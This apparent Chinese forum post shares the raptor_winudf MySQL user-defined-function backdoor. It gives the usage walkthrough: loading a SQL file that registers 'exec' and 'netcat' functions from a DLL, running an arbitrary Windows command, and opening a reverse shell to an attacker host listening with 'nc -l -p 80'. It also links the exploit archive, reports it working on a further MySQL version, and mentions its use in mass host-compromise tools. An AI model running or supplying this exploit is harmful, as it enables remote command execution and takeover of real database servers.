技术非原创 我只是测试了额外的版本

=============================================

Usage example:
# mysql -h 192.168.0.203 < raptor_winudf.sql
# mysql -h 192.168.0.203
mysql> select * from mysql.func;
+--------+-----+------------+----------+
| name | ret | dl
| type |
+--------+-----+------------+----------+
| netcat | 2 | winudf.dll | function |
| exec | 2 | winudf.dll | function |
+--------+-----+------------+----------+
2 rows in set (0.00 sec)
mysql> select exec('echo foo > c:\\bar.txt');
mysql> select netcat('192.168.0.147');
[on the attacker's host]
# nc -l -p 80
[...]
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
[...]
C:\mysql\data>type c:\bar.txt

============================================

作者测试了如下版本:

-- Tested on:
-- MySQL 4.0.18-win32 (running on Windows XP SP2)
-- MySQL 4.1.22-win32 (running on Windows XP SP2)
-- MySQL 5.0.27-win32 (running on Windows XP SP2)

我在 5.2.3 测试成功

Backdoors for Mysql raptor_winudf

raptor_winudf.tar:http://115.com/file/bhfolk3k

mysql root才可以加载组件
执行cmd只限制win
但是sqlmap 下发现了linux的 udf.os
估计也一样可以
-----------------------------
这个是很早的东西了 就是一个反弹shell的
以前3306 抓鸡工具就是用这个 然后用nc tagip <<1.bat 发送加载bat执行
这个太粗糙了 dll文件编码竟然不是HEX的
就是反弹shell的 好执行shell命令
一堆抓鸡都是用这个sql